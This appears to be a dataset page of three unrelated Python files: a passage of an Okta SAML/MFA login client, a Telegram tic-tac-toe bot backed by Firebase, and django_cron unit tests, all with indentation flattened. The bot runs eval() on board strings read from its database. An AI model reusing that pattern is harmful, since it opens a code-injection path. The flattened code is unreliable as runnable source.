saml_response = input_tag.get('value')
elif input_tag.get('name') == 'RelayState':
relay_state = input_tag.get('value')
if saml_response is None:
state_token = self._extract_state_token_from_http_response(response)
if state_token:
api_response = self.stepup_auth(url, state_token)
if 'sessionToken' in api_response:
saml_request_url = url + '?sessionToken=' + api_response['sessionToken']
else:
saml_request_url = url + '?stateToken=' + api_response['_links']['next']['href']
saml_response = self.get_saml_response(saml_request_url)
return saml_response
saml_error = 'Did not receive SAML Response after successful authentication [' + url + ']'
if saml_soup.find(class_='error-content') is not None:
saml_error += '\n' + saml_soup.find(class_='error-content').get_text()
raise RuntimeError(saml_error)
return {'SAMLResponse': saml_response, 'RelayState': relay_state, 'TargetUrl': form_action}
def check_kwargs(self, kwargs):
if self._use_oauth_access_token is True:
if 'headers' not in kwargs:
kwargs['headers'] = {}
kwargs['headers']['Authorization'] = "Bearer {}".format(self._oauth_access_token)
if self._use_oauth_id_token is True:
if 'headers' not in kwargs:
kwargs['headers'] = {}
kwargs['headers']['Authorization'] = "Bearer {}".format(self._oauth_access_token)
return kwargs
def get(self, url, **kwargs):
""" Retrieve resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.get(url, **parameters)
def post(self, url, **kwargs):
""" Create resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.post(url, **parameters)
def put(self, url, **kwargs):
""" Modify resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.put(url, **parameters)
def delete(self, url, **kwargs):
""" Delete resource that is protected by Okta """
parameters = self.check_kwargs(kwargs)
return self._http_client.delete(url, **parameters)
def _choose_factor(self, factors):
""" gets a list of available authentication factors and
asks the user to select the factor they want to use """
self.ui.info("Multi-factor Authentication required.")
# filter the factor list down to just the types specified in preferred_mfa_type
preferred_factors = []
# even though duo supports both passcode and push, okta only lists web as an available factor. This if statement
# adds the additional supported factors only if the provider is duo, and the web factor is the only one provided
if len(factors) == 1 and factors[0].get('provider') == 'DUO' and factors[0].get('factorType') == 'web':
push = copy.deepcopy(factors[0])
push['factorType'] = "push"
factors.append(push)
passcode = copy.deepcopy(factors[0])
passcode['factorType'] = "passcode"
factors.append(passcode)
if self._preferred_mfa_type is not None:
preferred_factors = list(filter(lambda item: item['factorType'] == self._preferred_mfa_type, factors))
# If the preferred factor isn't in the list of available factors, we'll let the user know before
# prompting to select another.
if not preferred_factors:
self.ui.notify('Preferred factor type of {} not available.'.format(self._preferred_mfa_type))
if len(preferred_factors) == 1:
factor_name = self._build_factor_name(preferred_factors[0])
self.ui.info(factor_name + ' selected')
selection = factors.index(preferred_factors[0])
else:
self.ui.info("Pick a factor:")
# print out the factors and let the user select
for i, factor in enumerate(factors):
factor_name = self._build_factor_name(factor)
if factor_name != "":
self.ui.info('[{}] {}'.format(i, factor_name))
selection = self._get_user_int_factor_choice(len(factors))
# make sure the choice is valid
if selection is None:
raise errors.GimmeAWSCredsError("You made an invalid selection")
return factors[selection]
def _get_user_int_factor_choice(self, max_int, max_retries=5):
for _ in range(max_retries):
value = self.ui.input('Selection: ')
try:
selection = int(value.strip())
except ValueError:
self.ui.warning(
'Invalid selection {!r}, must be an integer value.'.format(value)
)
continue
if 0 <= selection <= max_int:
return selection
else:
self.ui.warning(
'Selection {!r} out of range <0, {}>'.format(selection, max_int)
)
return None
def _build_factor_name(self, factor):
""" Build the display name for a MFA factor based on the factor type"""
if factor['provider'] == 'DUO':
return factor['factorType'] + ": " + factor['provider'].capitalize()
elif factor['factorType'] == 'push':
return "Okta Verify App: " + factor['profile']['deviceType'] + ": " + factor['profile']['name']
elif factor['factorType'] == 'sms':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'call':
return factor['factorType'] + ": " + factor['profile']['phoneNumber']
elif factor['factorType'] == 'token:software:totp':
return factor['factorType'] + "( " + factor['provider'] + " ) : " + factor['profile']['credentialId']
elif factor['factorType'] == 'token':
return factor['factorType'] + ": " + factor['profile']['credentialId']
elif factor['factorType'] == 'u2f':
return factor['factorType'] + ": " + factor['factorType']
elif factor['factorType'] == 'webauthn':
factor_name = None
try:
registered_authenticators = RegisteredAuthenticators(self.ui)
credential_id = websafe_decode(factor['profile']['credentialId'])
factor_name = registered_authenticators.get_authenticator_user(credential_id)
except Exception:
pass
default_factor_name = factor['profile'].get('authenticatorName') or factor['factorType']
factor_name = factor_name or default_factor_name
return factor['factorType'] + ": " + factor_name
elif factor['factorType'] == 'token:hardware':
return factor['factorType'] + ": " + factor['provider']
else:
return "Unknown MFA type: " + factor['factorType']
def _get_username_password_creds(self):
"""Get's creds for Okta login from the user."""
if self._username is None:
# ask the user
self._username = self.ui.input('Username: ')
username = self._username
password = self._password
if not password and self.KEYRING_ENABLED:
try:
# If the OS supports a keyring, offer to save the password
password = keyring.get_password(self.KEYRING_SERVICE, username)
self.ui.info("Using password from keyring for {}".format(username))
except RuntimeError:
self.ui.warning("Unable to get password from keyring.")
if not password:
# Set prompt to include the user name, since username could be set
# via OKTA_USERNAME env and user might not remember.
for x in range(0, 5):
passwd_prompt = "Okta Password for {}: ".format(username)
password = getpass.getpass(prompt=passwd_prompt)
if len(password) > 0:
break
if self.KEYRING_ENABLED:
# If the OS supports a keyring, offer to save the password
# if self.ui.input("Do you want to save this password in the keyring? (y/N) ") == 'y':
# try:
# keyring.set_password(self.KEYRING_SERVICE, username, password)
# self.ui.info("Password for {} saved in keyring.".format(username))
# except RuntimeError as err:
# self.ui.warning("Failed to save password in keyring: " + str(err))
pass
if not password:
raise errors.GimmeAWSCredsError('Password was not provided. Exiting.')
return {'username': username, 'password': password}
def setup_fido_authenticator(self):
setup_fido_authenticator_url = self._okta_org_url + '/user/settings/factors/setup?factorType=FIDO_WEBAUTHN'
response = self._http_client.get(setup_fido_authenticator_url, headers=self._get_headers(),
verify=self._verify_ssl_certs)
response.raise_for_status()
parsed_url = urlparse(response.url)
if parsed_url and parsed_url.path == '/user/verify_password':
response = self._verify_password(response)
state_token = self._extract_state_token_from_http_response(response)
if not state_token:
raise RuntimeError('Could not extract state token from http response')
try:
self.stepup_auth(setup_fido_authenticator_url, state_token)
except errors.GimmeAWSCredsMFAEnrollStatus:
# Expected while adding a new fido authenticator
pass
response = self._http_client.get(setup_fido_authenticator_url, json={'stateToken': state_token},
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
state_token = self._extract_state_token_from_http_response(response)
credential_id, user_name = self._activate_webauthn_factor(state_token)
self.ui.info('\nAuthenticator setup finished successfully.')
return credential_id, user_name
def _verify_password(self, verify_password_page_response):
creds = self._get_username_password_creds()
saml_soup = BeautifulSoup(verify_password_page_response.text, "html.parser")
token_elem = saml_soup.find(id='_xsrfToken')
if not token_elem:
raise RuntimeError('Could not find expected xsrf token in password verification page: id="_xsrfToken"')
if not token_elem.has_attr('value'):
raise RuntimeError('Could not find expected "value" attribute for xsrf dom element in password '
'verification page')
xsrf_token = token_elem.get('value')
if not xsrf_token:
raise RuntimeError('Could not find non-blank "value" attribute for xsrf dom element in password'
'verification page')
headers = self._get_headers()
# Must be form urlencoded
headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
data = '_xsrfToken={xsrf_token}&password={password}'.format(xsrf_token=xsrf_token, password=creds['password'])
response = self._http_client.post(self._okta_org_url + '/user/verify_password',
data=data, headers=headers, verify=self._verify_ssl_certs)
response.raise_for_status()
response = self._http_client.get(
self._okta_org_url + '/login/second-factor?fromURI=%2Fenduser%2Fsettings&forcePrompt=true&hideBgImage=true',
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
return response
def _activate_webauthn_factor(self, state_token):
enrollment_response = self._enroll_factor(state_token)
response_json = enrollment_response.json()
next_link = response_json['_links']['next']
if next_link['name'] != 'activate':
raise RuntimeError('Expected next link to be an activation link, actually got: ' + next_link["name"])
factor_obj = response_json['_embedded']['factor']
activation_obj = factor_obj['_embedded']['activation']
challenge = activation_obj.get('challenge')
user_obj = activation_obj.get('user', {})
webauthn_client = WebAuthnClient(self.ui, self._okta_org_url, challenge)
client_data_json, attestation = webauthn_client.make_credential(user_obj)
client_data = str(base64.urlsafe_b64encode(client_data_json), 'utf-8')
attestation_data = str(base64.urlsafe_b64encode(attestation), 'utf-8')
response = self._http_client.post(
next_link['href'],
json={"stateToken": state_token, "clientData": client_data, "attestation": attestation_data},
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
session_token = response.json()['sessionToken']
redirect_url = quote(self._okta_org_url + '/enduser/settings?enrolledFactor=FIDO_WEBAUTHN')
response = self._http_client.get(
self._okta_org_url + '/login/sessionCookieRedirect?checkAccountSetupComplete=true&'
'token={session_token}&redirectUrl={redirect_url}'.format(session_token=session_token,
redirect_url=redirect_url),
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
return attestation.auth_data.credential_data.credential_id, user_obj.get('name', 'gimme-aws-creds')
def _enroll_factor(self, state_token):
factors = self._introspect_factors(state_token)
if len(factors) != 1:
raise RuntimeError('Expected the state token to request enrollment for a specific factor')
# The state token should be set to return a specific factor
webauthn_factor = factors[0]
response = self._http_client.post(
webauthn_factor['_links']['enroll']['href'],
json={"stateToken": state_token, "factorType": webauthn_factor['factorType'],
"provider": webauthn_factor['provider']},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
return response
def _introspect_factors(self, state_token):
response = self._http_client.post(self._okta_org_url + '/api/v1/authn/introspect',
json={"stateToken": state_token}, headers=self._get_headers(),
verify=self._verify_ssl_certs)
response.raise_for_status()
factors = response.json()['_embedded']['factors']
if not factors:
raise RuntimeError('Could not introspect factors')
return factors
@staticmethod
def _extract_state_token_from_http_response(http_res):
saml_soup = BeautifulSoup(http_res.text, "html.parser")
if hasattr(saml_soup.title, 'string') and re.match(".* - (Extra Verification|Vérification supplémentaire)$", saml_soup.title.string):
# extract the stateToken from the Javascript code in the page and step up to MFA
# noinspection PyTypeChecker
state_token = decode(re.search(r"var stateToken = '(.*)';", http_res.text).group(1), "unicode-escape")
return state_token
for tag in saml_soup.find_all('body'):
# checking all the tags in body tag for Extra Verification string
if re.search(r"Extra Verification", tag.text, re.IGNORECASE):
# extract the stateToken from response (form action) instead of javascript variable
# noinspection PyTypeChecker
pre_state_token = decode(re.search(r"stateToken=(.*?[ \"])", http_res.text).group(1), "unicode-escape")
state_token = pre_state_token.rstrip('\"')
return state_token
return None
|
tic_tac_toe.py
|
import telebot
import pyrebase
import threading
import schedule
from time import time, sleep
from tabulate import tabulate
from telebot.types import InlineKeyboardButton
from telebot.types import InlineKeyboardMarkup
from telebot.types import InlineQueryResultArticle
from telebot.types import InputTextMessageContent
config = {
"apiKey" : "",
"authDomain" : "",
"databaseURL" : "",
"projectId" : "",
"storageBucket" : "",
"messagingSenderId" : "",
"appId" : "",
"measurementId" : "",
} # Your FIREBASE DATABASE configurations
def emoji_board(game): # Creates the board in ASCII format
emojis = {"-":"-", "x":"x","o":"o"}
board, temp = [], []
for count, _ in enumerate(game, 1):
if count == len(game):
temp.append(emojis[_])
board.append(temp)
elif count % 3 != 0:
temp.append(emojis[_])
else:
temp.append(emojis[_])
board.append(temp)
temp = []
return tabulate(board, tablefmt="grid")
def check_win(game, game_id): # Checks the status of the game
wins = [
(0,1,2), (3,4,5), (6,7,8), (0,4,8),
(0,3,6), (1,4,7), (2,5,8), (2,4,6),
]
for win in wins:
C1 = (game[win[0]], game[win[1]], game[win[2]]) == ("x","x","x")
C2 = (game[win[0]], game[win[1]], game[win[2]]) == ("o","o","o")
if C1 or C2:
bot.edit_message_reply_markup(inline_message_id=game_id, reply_markup=None)
winner = "X" if C1 else "O"
bot.edit_message_text(inline_message_id=game_id, text=f"<b>Congratulations! 🎉\n\
\nPlayer {winner} wins! 🥳\n\n<code>{emoji_board(game)}</code></b>")
database.child(game_id).remove()
return "True"
else:
if "-" not in game: return "Draw"
else: return "False"
firebase = pyrebase.initialize_app(config)
database = firebase.database()
API_KEY = "" # API TOKEN from @BotFather
BANNER = "" # FILE ID of banner for your bot
bot = telebot.TeleBot(API_KEY, parse_mode="HTML") # Initializing the bot
def remove_expired(): # Deletes all expired games
try:
for game in database.get().each():
expiry, id = int(game.val()["expiry"]), game.val()["id"]
if int(time()) - expiry >= 300:
database.child(id).remove()
bot.edit_message_text(inline_message_id=id, text="<b>Game expired! 🙃</b>")
bot.edit_message_reply_markup(inline_message_id=id, reply_markup=None)
except:
pass
def create_game_board(game): # Creates a new empty game board
game_board, buttons = InlineKeyboardMarkup(row_width = 3), []
for pos, _ in enumerate(game, 1):
buttons.append(InlineKeyboardButton(_, callback_data=f'{pos}'))
game_board.add(*buttons)
return game_board
@bot.message_handler(commands="start")
def start(message): # Starts the bot
bot.send_photo(message.chat.id, BANNER, caption="<b>Wanna a play a game of Tic-Tac-Toe?\n\
\nClick the buton and play with your friends!</b>",
reply_markup = InlineKeyboardMarkup().row(InlineKeyboardButton("Play Tic-Tac-Toe!",
switch_inline_query="tic_tac_toe")))
@bot.inline_handler(lambda query: len(query.query) == 0 or query.query == 'tic_tac_toe')
def send_game(query): # Creating the inline query handler
play = InlineKeyboardMarkup().row(InlineKeyboardButton("Tap to play!",
callback_data=f"play{query.from_user.id}"))
try:
t_t_t = InlineQueryResultArticle('start_game',"丅Ꭵᑕ-丅ᗩᑕ-丅ᗝᗴ",
InputTextMessageContent("<b>Start the game! 🥳\n\nGame will be expire in 5 minutes!</b>",
parse_mode = "HTML"),reply_markup = play,
description = "Play a game of Tic-Tac-Toe with your friends and family! ✌🏻",
thumb_url = "https://github.com/TECH-SAVVY-GUY/telegram-games/blob/master/assets/tic-tac-toe.jpg?raw=true")
bot.answer_inline_query(query.id, [t_t_t])
except:
pass
@bot.callback_query_handler(func=lambda call: True)
def callback_listener(call): # A single callback listener for all calls
data, game_id = call.data, call.inline_message_id
if data[:4] == "play": # Starting the game
player_x, player_o = int(data[4:]), int(call.from_user.id)
if player_o == player_x:
bot.answer_callback_query(call.id,
"⚠️ Must be a different player! ⚠️", show_alert=True)
else:
bot.edit_message_text(inline_message_id=game_id, text="<b>Game in progress!</b>")
bot.edit_message_reply_markup(inline_message_id=game_id,
reply_markup=create_game_board(["-"] * 9))
database.child(game_id).child("id").set(game_id)
database.child(game_id).child("player_x").set(int(data[4:]))
database.child(game_id).child("player_o").set(call.from_user.id)
database.child(game_id).child("count").set(1)
database.child(game_id).child("board").set(f"{['-'] * 9}")
database.child(game_id).child("expiry").set(int(time()))
elif data.isnumeric(): # Player move algorithm
if int(data) in range(1,10):
game = database.child(game_id).get()
players = [int(game.val()["player_x"]), int(game.val()["player_o"])]
if call.from_user.id not in players:
bot.answer_callback_query(call.id,
"❌ You are not a player! ❌", show_alert=True)
else:
count = int(game.val()["count"])
if count % 2 != 0:
if call.from_user.id != players[0]:
bot.answer_callback_query(call.id,
"⚠️ Wait for your Turn! ⚠️", show_alert=True)
else:
board = eval(game.val()["board"])
if board[int(data)-1] == "-":
board[int(data)-1] = "x"
bot.edit_message_reply_markup(inline_message_id=game_id,
reply_markup=create_game_board(board))
stat = check_win(board, game_id)
if stat != "True":
if str(stat) == "Draw":
bot.edit_message_reply_markup(inline_message_id=game_id, reply_markup=None)
bot.edit_message_text(inline_message_id=game_id,
text = f"<b>It's a draw! 🥱\n\n<code>{emoji_board(board)}</code></b>")
database.child(game_id).remove()
else:
database.child(game_id).update({"board":str(board)})
database.child(game_id).update({"count":count + 1})
else:
if call.from_user.id != players[-1]:
bot.answer_callback_query(call.id,
"⚠️ Wait for your Turn! ⚠️", show_alert=True)
else:
board = eval(game.val()["board"])
if board[int(data)-1] == "-":
board[int(data)-1] = "o"
bot.edit_message_reply_markup(inline_message_id=game_id,
reply_markup=create_game_board(board))
stat = check_win(board, game_id)
if stat != "True":
if str(stat) == "Draw":
bot.edit_message_reply_markup(inline_message_id=game_id, reply_markup=None)
bot.edit_message_text(inline_message_id=game_id,
text = f"<b>It's a draw! 🥱\n\n<code>{emoji_board(board)}</code></b>")
database.child(game_id).remove()
else:
database.child(game_id).update({"board":str(board)})
database.child(game_id).update({"count":count + 1})
def thrd(): # Scheduling the deletion of expired games
while True:
schedule.run_pending()
sleep(1)
schedule.every(1).minutes.do(remove_expired)
t = threading.Thread(target=thrd) # Creating a seperate thread
def main(): # Executing all the threads
t.start()
bot.infinity_polling()
|
tests.py
|
import threading
from time import sleep
from datetime import timedelta
from mock import patch
from freezegun import freeze_time
from django import db
from django.test import TransactionTestCase
from django.core.management import call_command
from django.test.utils import override_settings
from django.test.client import Client
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django_cron.cron import FailedRunsNotificationCronJob
from django_cron.helpers import humanize_duration
from django_cron.models import CronJobLog
import test_crons
class OutBuffer(object):
def __init__(self):
self._str_cache = ''
self.content = []
self.modified = False
def write(self, *args):
self.content.extend(args)
self.modified = True
def str_content(self):
if self.modified:
self._str_cache = ''.join((str(x) for x in self.content))
self.modified = False
return self._str_cache
def call(*args, **kwargs):
"""
Run the runcrons management command with a supressed output.
"""
out_buffer = OutBuffer()
call_command('runcrons', *args, stdout=out_buffer, **kwargs)
return out_buffer.str_content()
class DjangoCronTestCase(TransactionTestCase):
def setUp(self):
CronJobLog.objects.all().delete()
success_cron = 'test_crons.TestSucessCronJob'
error_cron = 'test_crons.TestErrorCronJob'
five_mins_cron = 'test_crons.Test5minsCronJob'
run_at_times_cron = 'test_crons.TestRunAtTimesCronJob'
wait_3sec_cron = 'test_crons.Wait3secCronJob'
does_not_exist_cron = 'ThisCronObviouslyDoesntExist'
no_code_cron = 'test_crons.NoCodeCronJob'
test_failed_runs_notification_cron = 'django_cron.cron.FailedRunsNotificationCronJob'
class BaseTests(DjangoCronTestCase):
def assertReportedRun(self, job_cls, response):
expected_log = u"[\N{HEAVY CHECK MARK}] {0}".format(job_cls.code)
self.assertIn(expected_log.encode('utf8'), response)
def assertReportedNoRun(self, job_cls, response):
expected_log = u"[ ] {0}".format(job_cls.code)
self.assertIn(expected_log.encode('utf8'), response)
def assertReportedFail(self, job_cls, response):
expected_log = u"[\N{HEAVY BALLOT X}] {0}".format(job_cls.code)
self.assertIn(expected_log.encode('utf8'), response)
def test_success_cron(self):
logs_count = CronJobLog.objects.all().count()
call(self.success_cron, force=True)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
def test_failed_cron(self):
logs_count = CronJobLog.objects.all().count()
response = call(self.error_cron, force=True)
self.assertReportedFail(test_crons.TestErrorCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
def test_not_exists_cron(self):
logs_count = CronJobLog.objects.all().count()
response = call(self.does_not_exist_cron, force=True)
self.assertIn('Make sure these are valid cron class names', response)
self.assertIn(self.does_not_exist_cron, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count)
@patch('django_cron.logger')
def test_requires_code(self, mock_logger):
response = call(self.no_code_cron, force=True)
self.assertIn('does not have a code attribute', response)
mock_logger.info.assert_called()
@override_settings(DJANGO_CRON_LOCK_BACKEND='django_cron.backends.lock.file.FileLock')
def test_file_locking_backend(self):
logs_count = CronJobLog.objects.all().count()
call(self.success_cron, force=True)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
@patch.object(test_crons.TestSucessCronJob, 'do')
def test_dry_run_does_not_perform_task(self, mock_do):
response = call(self.success_cron, dry_run=True)
self.assertReportedRun(test_crons.TestSucessCronJob, response)
mock_do.assert_not_called()
self.assertFalse(CronJobLog.objects.exists())
@patch.object(test_crons.TestSucessCronJob, 'do')
def test_non_dry_run_performs_task(self, mock_do):
mock_do.return_value = 'message'
response = call(self.success_cron)
self.assertReportedRun(test_crons.TestSucessCronJob, response)
mock_do.assert_called_once()
self.assertEquals(1, CronJobLog.objects.count())
log = CronJobLog.objects.get()
self.assertEquals('message', log.message)
self.assertTrue(log.is_success)
def test_runs_every_mins(self):
logs_count = CronJobLog.objects.all().count()
with freeze_time("2014-01-01 00:00:00"):
response = call(self.five_mins_cron)
self.assertReportedRun(test_crons.Test5minsCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
with freeze_time("2014-01-01 00:04:59"):
response = call(self.five_mins_cron)
self.assertReportedNoRun(test_crons.Test5minsCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
with freeze_time("2014-01-01 00:05:01"):
response = call(self.five_mins_cron)
self.assertReportedRun(test_crons.Test5minsCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 2)
def test_runs_at_time(self):
logs_count = CronJobLog.objects.all().count()
with freeze_time("2014-01-01 00:00:01"):
response = call(self.run_at_times_cron)
self.assertReportedRun(test_crons.TestRunAtTimesCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
with freeze_time("2014-01-01 00:04:50"):
response = call(self.run_at_times_cron)
self.assertReportedNoRun(test_crons.TestRunAtTimesCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
with freeze_time("2014-01-01 00:05:01"):
response = call(self.run_at_times_cron)
self.assertReportedRun(test_crons.TestRunAtTimesCronJob, response)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 2)
def test_silent_produces_no_output_success(self):
response = call(self.success_cron, silent=True)
self.assertEquals(1, CronJobLog.objects.count())
self.assertEquals('', response)
def test_silent_produces_no_output_no_run(self):
with freeze_time("2014-01-01 00:00:00"):
response = call(self.run_at_times_cron, silent=True)
self.assertEquals(1, CronJobLog.objects.count())
self.assertEquals('', response)
with freeze_time("2014-01-01 00:00:01"):
response = call(self.run_at_times_cron, silent=True)
self.assertEquals(1, CronJobLog.objects.count())
self.assertEquals('', response)
def test_silent_produces_no_output_failure(self):
response = call(self.error_cron, silent=True)
self.assertEquals('', response)
def test_admin(self):
password = 'test'
user = User.objects.create_superuser(
'test',
'test@tivix.com',
password
)
self.client = Client()
self.client.login(username=user.username, password=password)
# edit CronJobLog object
call(self.success_cron, force=True)
log = CronJobLog.objects.all()[0]
url = reverse('admin:django_cron_cronjoblog_change', args=(log.id,))
response = self.client.get(url)
self.assertIn('Cron job logs', str(response.content))
def run_cronjob_in_thread(self, logs_count):
call(self.wait_3sec_cron)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
db.close_old_connections()
def test_cache_locking_backend(self):
"""
with cache locking backend
"""
logs_count = CronJobLog.objects.all().count()
t = threading.Thread(target=self.run_cronjob_in_thread, args=(logs_count,))
t.daemon = True
t.start()
# this shouldn't get running
sleep(0.1) # to avoid race condition
call(self.wait_3sec_cron)
t.join(10)
self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
# TODO: this test doesn't pass - seems that second cronjob is locking file
# however it should throw an exception that file is locked by other cronjob
# @override_settings(
# DJANGO_CRON_LOCK_BACKEND='django_cron.backends.lock.file.FileLock',
# DJANGO_CRON_LOCKFILE_PATH=os.path.join(os.getcwd())
# )
# def test_file_locking_backend_in_thread(self):
# """
# with file locking backend
# """
# logs_count = CronJobLog.objects.all().count()
# t = threading.Thread(target=self.run_cronjob_in_thread, args=(logs_count,))
# t.daemon = True
# t.start()
# # this shouldn't get running
# sleep(1) # to avoid race condition
# call(self.wait_3sec_cron)
# t.join(10)
# self.assertEqual(CronJobLog.objects.all().count(), logs_count + 1)
def test_humanize_duration(self):
test_subjects = (
(timedelta(days=1, hours=1, minutes=1, seconds=1), '1 day, 1 hour, 1 minute, 1 second'),
(timedelta(days=2), '2 days'),
(timedelta(days=15, minutes=4), '15 days, 4 minutes'),
(timedelta(), '< 1 second'),
)
for duration, humanized in test_subjects:
self.assertEqual(
humanize_duration(duration),
humanized
)
class FailureReportTests(DjangoCronTestCase):
"""
Unit tests for the FailedRunsNotificationCronJob.
"""
def _error_cron(self):
call(self.error_cron, force=True)
def _report_cron(self):
call(self.test_failed_runs_notification_cron, force=True)
def _error_and_report(self):
self._error_cron()
self._report_cron()
def _resolve_reported_failures(self, cron_cls, failed_jobs):
"""
Resolve the failed jobs passed to the notifier's report_failure().
This allows us to assert the jobs passed given that failed jobs is a
queryset which shouldn't match any instances after the notifier runs
as it should make all log entries as having been reported.
"""
self.reported_cls = cron_cls
self.reported_jobs = set(failed_jobs)
@patch.object(FailedRunsNotificationCronJob, 'report_failure')
def test_failed_notifications(self, mock_report):
"""
By default, the user should be notified after 10 job failures.
"""
mock_report.side_effect = self._resolve_reported_failures
for _ in range(9):
self._error_and_report()
self.assertEquals(0, mock_report.call_count)
# The tenth error triggers the report
self._error_and_report()
self.assertEqual(1, mock_report.call_count)
# The correct job class and entries should be included
self.assertEquals(test_crons.TestErrorCronJob, self.reported_cls)
error_logs = CronJobLog.objects.filter(
code=test_crons.TestErrorCronJob.code
)
self.assertEquals(set(error_logs), self.reported_jobs)
@patch.object(FailedRunsNotificationCronJob, 'report_failure')
@override_settings(CRON_MIN_NUM_FAILURES=1)
def test_settings_can_override_number_of_failures(self, mock_report):
mock_report.side_effect = self._resolve_reported_failures
self._error_and_report()
self.assertEqual(1, mock_report.call_count)
@patch.object(FailedRunsNotificationCronJob, 'report_failure')
@override_settings(CRON_MIN_NUM_FAILURES=1)
def test_logs_all_unreported(self, mock_report):
mock_report.side_effect = self._resolve_reported_failures
self._error_cron()
self._error_and_report()
self.assertEqual(1, mock_report.call_count)
self.assertEqual(2, len(self.reported_jobs))
@patch.object(FailedRunsNotificationCronJob, 'report_failure')
@override_settings(CRON_MIN_NUM_FAILURES=1)
def test_only_logs_failures(self, mock_report):
mock_report.side_effect = self._resolve_reported_failures
call(self.success_cron, force=True)
self._error_and_report()
self.assertEqual(
self.reported_jobs,
{CronJobLog.objects.get(code=test_crons.TestErrorCronJob.code)}
)
@patch.object(FailedRunsNotificationCronJob, 'report_failure')
@override_settings(CRON_MIN_NUM_FAILURES=1)
def test_only_reported_once(self, mock_report):
mock_report.side_effect = self._resolve_reported_failures
self._error_and_report()
self.assertEqual(1, mock_report.call_count)
# Calling the notifier for a second time doesn't report a second time
self._report_cron()
self.assertEqual(1, mock_report.call_count)
@patch('django_cron.cron.send_mail')
@override_settings(
CRON_MIN_NUM_FAILURES=1,
CRON_FAILURE_FROM_EMAIL='from@email.com',
CRON_FAILURE_EMAIL_RECIPIENTS=['foo@bar.com', 'x@y.com'],
FAILED_RUNS_CRONJOB_EMAIL_PREFIX='ERROR!!!'
)
def test_uses_send_mail(self, mock_send_mail):
"""
Test that django_common is used to send the email notifications.
"""
self._error_and_report()
self.assertEquals(1, mock_send_mail.call_count)
kwargs = mock_send_mail.call_args[1]
self.assertIn('ERROR!!!', kwargs['subject'])
self.assertEquals('from@email.com', kwargs['from_email'])
self.assertEquals(
['foo@bar.com', 'x@y.com'], kwargs['recipient_emails']
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.